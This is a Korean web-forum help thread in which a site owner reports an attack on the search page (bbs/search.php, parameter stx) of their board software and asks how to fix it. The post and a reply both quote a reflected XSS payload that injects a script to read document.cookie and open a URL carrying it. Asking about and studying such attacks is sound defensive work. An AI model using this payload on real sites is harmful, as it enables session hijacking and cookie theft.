게시판에 아래 키워드를 입력하면..

나즈나

· 13년 전 · 조회 847 847 · 댓글 2 2

이 키워드를 입력하면 사이트에 에러가 나버리는데요..
계속 누가 악질적으로 이짓을해서 일단 검색을 아예 빼버렷는데
"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이걸 bbs/search.php에 날리면 그대로 먹히거든요;;
어떻게 해결하죠..ㄷㄷ

댓글 작성

댓글을 작성하시려면 로그인이 필요합니다.

로그인하기

댓글 2개

취약점

프로필 보기 이 회원 글보기

13년 전

구체적으로 설명을해주셔야할것같습니다.
예를들어

http://test.com/gnu4/bbs/search.php?"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>

이런식으로요.

어떤변수에어떻게넣는지 그런게 중요할듯하네요.

나즈나

프로필 보기 이 회원 글보기

13년 전

검색이니까 당연히 stx아닐까요.ㄷㄷ
검색 파일에 외부에서 변수받아오는 것은 stx 뿐인걸로 아는데요..

게시글 목록

번호	제목	글쓴이	조회	날짜
284508	네이버에서 신디케이션 전체게시물이 보이지않는다며 답변이왔습니다T.T 12	유아이	17,722	11년 전
284499	문의글을 엑셀로 정리해서 달라는데요 mysql 에서 내보내기하면 한글다깨지는데요 4	앱보드	12,547	11년 전
284492	최근 로그인한 회원이 리스트 검색시 리스트의 최상위로... 5	alexseo	10,183	11년 전
284490	포인트랭크 해결 좀 해주세요 ㅜㅜ 7	제씨	10,909	11년 전
284484	포인트 랭크 질문 좀 드리겠습니다. 제발 부탁 좀 드리겠습니다 해결좀해주세요 ㅜㅜ 6	제씨	10,479	11년 전
284481	robots.txt 와 신디케이션 1	아썸	11,841	11년 전
284478	핸드폰으로 pc용 접속하면.... 화면사이즈문제 3	네오빡스	15,028	11년 전
284476	혹시 http://www.appsgeyser.com 여기에서.....	스타크루즈	11,476	11년 전
284474	이런 최신글 있을까요? 3	kimch	11,591	11년 전
284472	불당썸 사용 그림엑박 1	연금술샤	11,417	11년 전
284470	도메인 변경후 이미지 깨짐 2	호텔천사	12,265	11년 전
284458	폼메일전송 메일보내는방법좀요 2	별을기다리며	14,429	11년 전
284457	로그인,로그아웃,회원가입 스킨적용 및 연동방법좀요ㅠ 2	별을기다리며	11,920	11년 전
284454	회원가입에 필요한 파일? 2	MJEI	9,691	11년 전
284453	초보 게시판 관련 질문좀 드립니다. 2	장미란	10,560	11년 전
284447	카운트 갯수 구할때요 limit 이 안먹히는데요 왜그런가요 ㅎㅎ? 리밋할려면 어떻게 해야할까요?? 2	앱보드	16,394	11년 전
284446	회원가입시 아이디에 하이픈 - 사용하는 방법을 가르쳐주세요 2	닷넷	10,445	11년 전
284444	리스트 게시글 묶음처리 2	뽁스	9,124	11년 전
284441	아이핀 연동할때 세션값 변경되는 현상 1	비앙이	10,563	11년 전
284440	셀렉트문은 하나만 사용하고요. 3	alexseo	5,583	11년 전

1 2 3

전체 목록